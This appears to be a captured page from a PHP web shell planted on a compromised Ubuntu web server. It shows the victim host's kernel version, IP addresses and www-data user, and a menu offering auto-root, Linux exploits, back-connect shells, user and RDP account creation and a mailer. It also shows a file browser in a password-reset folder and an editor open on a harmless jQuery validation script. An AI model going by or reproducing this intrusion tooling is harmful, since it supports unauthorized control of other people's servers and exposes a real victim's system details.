Linux ip-172-26-7-228 5.4.0-1103-aws #111~18.04.1-Ubuntu SMP Tue May 23 20:04:10 UTC 2023 x86_64
Apache
: 172.26.7.228 | : 18.221.248.140
Cant Read [ /etc/named.conf ]
5.6.40-24+ubuntu18.04.1+deb.sury.org+1
www-data
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
kswu /
popup /
[ HOME SHELL ]
Name
Size
Permission
Action
dist
[ DIR ]
drwxr-xr-x
images
[ DIR ]
drwxr-xr-x
lib
[ DIR ]
drwxr-xr-x
collinfo_popup.css
3.91
KB
-rwxr-xr-x
collinfo_popup.js
11.62
KB
-rwxr-xr-x
jquery.maskedinput.js
7.24
KB
-rwxr-xr-x
jquery.min.js
93.54
KB
-rwxr-xr-x
jquery.redirect.js
1.18
KB
-rwxr-xr-x
resetPasswordEnterOTP.html
4.28
KB
-rwxr-xr-x
resetPasswordEnterOTP.js
3.84
KB
-rwxr-xr-x
resetPasswordSuccess.html
2.22
KB
-rwxr-xr-x
resetPasswordSuccess.js
4.34
KB
-rwxr-xr-x
resetPasswordUserInfo.html
3.21
KB
-rwxr-xr-x
resetPasswordUserInfo.js
3.84
KB
-rwxr-xr-x
stylesheet.css
18.88
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : resetPasswordEnterOTP.js
$(document).ready(function(){ $.mockjax({ url: "emails.action", response: function(settings) { var email = settings.data.email, emails = ["glen@marketo.com", "george@bush.gov", "me@god.com", "aboutface@cooper.com", "steam@valve.com", "bill@gates.com"]; this.responseText = "true"; if ( $.inArray( email, emails ) !== -1 ) { this.responseText = "false"; } }, responseTime: 500 }); jQuery.validator.addMethod("password", function( value, element ) { var result = this.optional(element) || value.length >= 6 && /\d/.test(value) && /[a-z]/i.test(value); if (!result) { element.value = ""; var validator = this; setTimeout(function() { validator.blockFocusCleanup = true; element.focus(); validator.blockFocusCleanup = false; }, 1); } return result; }, "Your password must be at least 6 characters long and contain at least one number and one character."); // a custom method making the default value for companyurl ("http://") invalid, without displaying the "invalid url" message jQuery.validator.addMethod("defaultInvalid", function(value, element) { return value != element.defaultValue; }, ""); jQuery.validator.addMethod("billingRequired", function(value, element) { if ($("#bill_to_co").is(":checked")) return $(element).parents(".subTable").length; return !this.optional(element); }, ""); jQuery.validator.messages.required = ""; $("form").validate({ invalidHandler: function(e, validator) { var errors = validator.numberOfInvalids(); if (errors) { var message = errors == 1 ? 'You missed 1 field. It has been highlighted below' : 'You missed ' + errors + ' fields. They have been highlighted below'; $("div.error span").html(message); $("div.error").show(); } else { $("div.error").hide(); } }, onkeyup: false, submitHandler: function() { $("div.error").hide(); validateResetPasswordOTP(); }, messages: { password2: { required: " ", equalTo: "Please enter the same password as above" }, email: { required: " ", email: "Enter Registered Email ", remote: jQuery.validator.format("{0} is already taken, please enter a different address.") }, mobile: { required: " ", mobile: "Enter Registered Mobile Number", remote: jQuery.validator.format("{0} is already taken, please enter a different address.") } }, debug:true }); $(".resize").vjustify(); $("div.buttonSubmit").hoverClass("buttonSubmitHover"); $("input.phone").mask("(999) 999-9999"); $("input.zipcode").mask("99999"); var creditcard = $("#creditcard").mask("9999 9999 9999 9999"); $("#cc_type").change( function() { switch ($(this).val()){ case 'amex': creditcard.unmask().mask("9999 999999 99999"); break; default: creditcard.unmask().mask("9999 9999 9999 9999"); break; } } ); // toggle optional billing address var subTableDiv = $("div.subTableDiv"); var toggleCheck = $("input.toggleCheck"); toggleCheck.is(":checked") ? subTableDiv.hide() : subTableDiv.show(); $("input.toggleCheck").click(function() { if (this.checked == true) { subTableDiv.slideUp("medium"); $("form").valid(); } else { subTableDiv.slideDown("medium"); } }); }); $.fn.vjustify = function() { var maxHeight=0; $(".resize").css("height","auto"); this.each(function(){ if (this.offsetHeight > maxHeight) { maxHeight = this.offsetHeight; } }); this.each(function(){ $(this).height(maxHeight); if (this.offsetHeight > maxHeight) { $(this).height((maxHeight-(this.offsetHeight-maxHeight))); } }); }; $.fn.hoverClass = function(classname) { return this.hover(function() { $(this).addClass(classname); }, function() { $(this).removeClass(classname); }); };
Close